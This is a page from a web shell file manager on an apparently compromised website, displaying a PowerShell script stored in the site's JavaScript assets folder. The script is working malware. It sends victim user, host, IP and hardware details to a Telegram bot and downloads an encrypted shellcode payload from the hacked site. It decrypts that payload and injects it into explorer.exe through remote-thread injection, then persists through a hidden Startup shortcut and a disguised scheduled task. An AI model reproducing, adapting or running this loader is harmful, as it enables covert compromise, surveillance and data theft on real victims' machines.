One Hat Cyber Team
Your IP :
216.73.216.193
Server IP :
170.247.48.121
Server :
Linux UBAPDWEB9271 3.10.0-1160.71.1.el7.x86_64 #1 SMP Tue Jun 28 15:37:28 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.0.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lelopagani.com.br
/
public
/
assets
/
js
/
Edit File:
see1.ps1
# === CONFIG === # Enhanced protocol support [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls13 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls $url = "https://www.lelopagani.com.br/assets/js/f_e.bin" $xorKey = 0x5A $aesPassword = "S3cur3Passphras3!" $group = "MDG" # === IMPROVED LOGGING FUNCTION === function Write-Log { param([string]$Message, [string]$Level = "INFO") $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" $logEntry = "[$timestamp] [$Level] $Message" Write-Host $logEntry # Could also write to file: $logEntry | Out-File -Append -FilePath "$env:TEMP\injector.log" } # === IMPROVED TELEGRAM NOTIFICATION === function Send-TelegramNotify { try { $username = $env:USERNAME $computerName = $env:COMPUTERNAME # More robust system info gathering $cpu = try { (Get-CimInstance Win32_Processor).Name.Trim() } catch { "Unknown" } $gpu = try { (Get-CimInstance Win32_VideoController | Select-Object -First 1).Name.Trim() } catch { "Unknown" } $ram = try { $totalBytes = (Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory "{0:N2} GB" -f ($totalBytes / 1GB) } catch { "Unknown" } # Fallback IP resolution $ip = try { (Invoke-RestMethod -Uri "https://api.ipify.org/?format=json" -TimeoutSec 5).ip } catch { try { (Get-NetIPAddress | Where-Object { $_.AddressFamily -eq 'IPv4' -and $_.PrefixOrigin -eq 'Dhcp' } | Select-Object -First 1).IPAddress } catch { "Unknown" } } $os = [System.Environment]::OSVersion.VersionString $msg = @" [+] New hit User: $username Host: $computerName OS: $os IP: $ip CPU: $cpu GPU: $gpu RAM: $ram Group: $group Timestamp: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss') "@ $bot = "7252153973:AAEEKvgf-cwqvWPviTklhbY6BPRbjwK3Jqw" $chat = "-1002513798195" $uri = "https://api.telegram.org/bot$bot/sendMessage" $body = @{ chat_id = $chat text = $msg disable_notification = $true } Invoke-RestMethod -Uri $uri -Method Post -Body $body -TimeoutSec 10 | Out-Null Write-Log "Telegram notification sent successfully" -Level "INFO" } catch { Write-Log "Failed to send Telegram notification: $_" -Level "ERROR" } } # === IMPROVED API IMPORT WITH ERROR HANDLING === try { $kernel32 = @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out IntPtr lpThreadId); [DllImport("kernel32.dll", SetLastError=true)] public static extern uint GetLastError(); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool CloseHandle(IntPtr hObject); } "@ Add-Type -TypeDefinition $kernel32 -IgnoreWarnings -ErrorAction Stop Write-Log "Win32 APIs imported successfully" -Level "INFO" } catch { Write-Log "Failed to import Win32 APIs: $_" -Level "ERROR" exit 1 } # === IMPROVED DECRYPTION FUNCTION === function Decrypt-DonutStub { param([byte[]]$data) try { if ($data.Length -lt 32) { throw "Data too short for decryption" } $key = [System.Text.Encoding]::UTF8.GetBytes($aesPassword.PadRight(32, 'X').Substring(0,32)) $iv = $data[0..15] $cipher = $data[16..($data.Length - 1)] $aes = [System.Security.Cryptography.Aes]::Create() $aes.Key = $key $aes.IV = $iv $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $decryptor = $aes.CreateDecryptor() $xorData = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length) # Parallel XOR for better performance on large payloads $result = New-Object byte[] $xorData.Length for ($i = 0; $i -lt $xorData.Length; $i++) { $result[$i] = $xorData[$i] -bxor $xorKey } Write-Log "Payload decrypted successfully ($($result.Length) bytes)" -Level "INFO" return $result } catch { Write-Log "Decryption failed: $_" -Level "ERROR" return $null } finally { if ($aes) { $aes.Dispose() } if ($decryptor) { $decryptor.Dispose() } } } # === IMPROVED INJECTION FUNCTION === function Invoke-ProcessInjection { param( [byte[]]$Shellcode, [string]$ProcessName = "explorer" ) $hProc = [IntPtr]::Zero $addr = [IntPtr]::Zero try { Write-Log "Attempting injection into $ProcessName" -Level "INFO" # Get process with better error handling $target = Get-Process -Name $ProcessName -ErrorAction Stop | Select-Object -First 1 if (-not $target) { throw "Process '$ProcessName' not found" } $targetPid = $target.Id Write-Log "Target PID: $targetPid" -Level "INFO" # Process access constants $PROCESS_ALL_ACCESS = 0x1F0FFF $MEM_COMMIT = 0x1000 $MEM_RESERVE = 0x2000 $PAGE_EXECUTE_READWRITE = 0x40 # Open process $hProc = [Win32]::OpenProcess($PROCESS_ALL_ACCESS, $false, $targetPid) if ($hProc -eq [IntPtr]::Zero) { $errorCode = [Win32]::GetLastError() throw "OpenProcess failed with error: $errorCode" } Write-Log "Process opened successfully" -Level "INFO" # Allocate memory $addr = [Win32]::VirtualAllocEx($hProc, [IntPtr]::Zero, $Shellcode.Length, ($MEM_COMMIT -bor $MEM_RESERVE), $PAGE_EXECUTE_READWRITE) if ($addr -eq [IntPtr]::Zero) { $errorCode = [Win32]::GetLastError() throw "VirtualAllocEx failed with error: $errorCode" } Write-Log "Memory allocated at 0x$($addr.ToString('X'))" -Level "INFO" # Write shellcode $bytesWritten = [IntPtr]::Zero $success = [Win32]::WriteProcessMemory($hProc, $addr, $Shellcode, $Shellcode.Length, [ref]$bytesWritten) if (-not $success -or $bytesWritten -eq 0) { $errorCode = [Win32]::GetLastError() throw "WriteProcessMemory failed with error: $errorCode" } Write-Log "Shellcode written ($bytesWritten bytes)" -Level "INFO" # Create remote thread $threadId = [IntPtr]::Zero $hThread = [Win32]::CreateRemoteThread($hProc, [IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [ref]$threadId) if ($hThread -eq [IntPtr]::Zero) { $errorCode = [Win32]::GetLastError() throw "CreateRemoteThread failed with error: $errorCode" } Write-Log "Remote thread created (TID: $threadId)" -Level "INFO" # Cleanup thread handle [Win32]::CloseHandle($hThread) | Out-Null return $true } catch { Write-Log "Injection failed: $_" -Level "ERROR" return $false } finally { # Cleanup process handle if ($hProc -ne [IntPtr]::Zero) { [Win32]::CloseHandle($hProc) | Out-Null } } } # === MAIN EXECUTION WITH BETTER ERROR HANDLING === Write-Log "Script started" -Level "INFO" try { # Send notification Send-TelegramNotify # Download payload with retry logic $maxRetries = 3 $retryCount = 0 $enc = $null while ($retryCount -lt $maxRetries) { try { Write-Log "Downloading payload (attempt $($retryCount + 1)/$maxRetries)" -Level "INFO" $enc = (Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 30).Content Write-Log "Payload downloaded successfully ($($enc.Length) bytes)" -Level "INFO" break } catch { $retryCount++ if ($retryCount -eq $maxRetries) { throw "Failed to download payload after $maxRetries attempts: $_" } Write-Log "Download failed, retrying in 2 seconds..." -Level "WARNING" Start-Sleep -Seconds 2 } } # Decrypt payload $donutShellcode = Decrypt-DonutStub $enc if (-not $donutShellcode) { throw "Failed to decrypt payload" } # Perform injection $injectionResult = Invoke-ProcessInjection -Shellcode $donutShellcode -ProcessName "explorer" if ($injectionResult) { Write-Log "Injection completed successfully" -Level "SUCCESS" } else { Write-Log "Injection failed" -Level "ERROR" } } catch { Write-Log "Main execution failed: $_" -Level "ERROR" } # === IMPROVED PERSISTENCE SETUP === try { Write-Log "Setting up persistence" -Level "INFO" $ps1Url = "https://www.lelopagani.com.br/assets/js/tt.txt" $ps1Path = "$env:APPDATA\tt.ps1" $lnkPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\tt.lnk" # Download with retry logic $maxRetries = 3 $retryCount = 0 while ($retryCount -lt $maxRetries) { try { Invoke-WebRequest -Uri $ps1Url -OutFile $ps1Path -TimeoutSec 30 -UseBasicParsing Write-Log "Downloaded persistence script to $ps1Path" -Level "INFO" break } catch { $retryCount++ if ($retryCount -eq $maxRetries) { throw "Failed to download persistence script: $_" } Start-Sleep -Seconds 2 } } # Verify file exists and has content if (-not (Test-Path $ps1Path) -or (Get-Item $ps1Path).Length -eq 0) { throw "Persistence script is empty or missing" } # Create shortcut with COM object error handling try { $WScriptShell = New-Object -ComObject WScript.Shell -ErrorAction Stop $shortcut = $WScriptShell.CreateShortcut($lnkPath) $shortcut.TargetPath = "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe" $shortcut.Arguments = "-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -File `"$ps1Path`"" $shortcut.WorkingDirectory = "$env:APPDATA" $shortcut.WindowStyle = 7 # Hidden window $shortcut.Save() Write-Log "Startup shortcut created: $lnkPath" -Level "INFO" # Release COM object [System.Runtime.Interopservices.Marshal]::ReleaseComObject($WScriptShell) | Out-Null [System.Runtime.Interopservices.Marshal]::ReleaseComObject($shortcut) | Out-Null } catch { Write-Log "Failed to create shortcut: $_" -Level "ERROR" } # Create scheduled task (only if running as admin) $isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) if ($isAdmin) { try { $taskName = "UpdaterEvery12h" # Check if task already exists $existingTask = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue if ($existingTask) { Write-Log "Scheduled task already exists, skipping creation" -Level "INFO" } else { $action = New-ScheduledTaskAction -Execute "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe" ` -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -File `"$ps1Path`"" $triggerAM = New-ScheduledTaskTrigger -Daily -At 4:00AM $triggerPM = New-ScheduledTaskTrigger -Daily -At 4:00PM Register-ScheduledTask -TaskName $taskName -Action $action -Trigger @($triggerAM, $triggerPM) ` -Description "System maintenance task" -RunLevel Highest -Force | Out-Null Write-Log "Scheduled task created: $taskName" -Level "INFO" } } catch { Write-Log "Failed to create scheduled task: $_" -Level "ERROR" } } else { Write-Log "Not running as admin, skipping scheduled task creation" -Level "WARNING" } Write-Log "Persistence setup completed" -Level "INFO" } catch { Write-Log "Persistence setup failed: $_" -Level "ERROR" } Write-Log "Script execution completed" -Level "INFO"
Simpan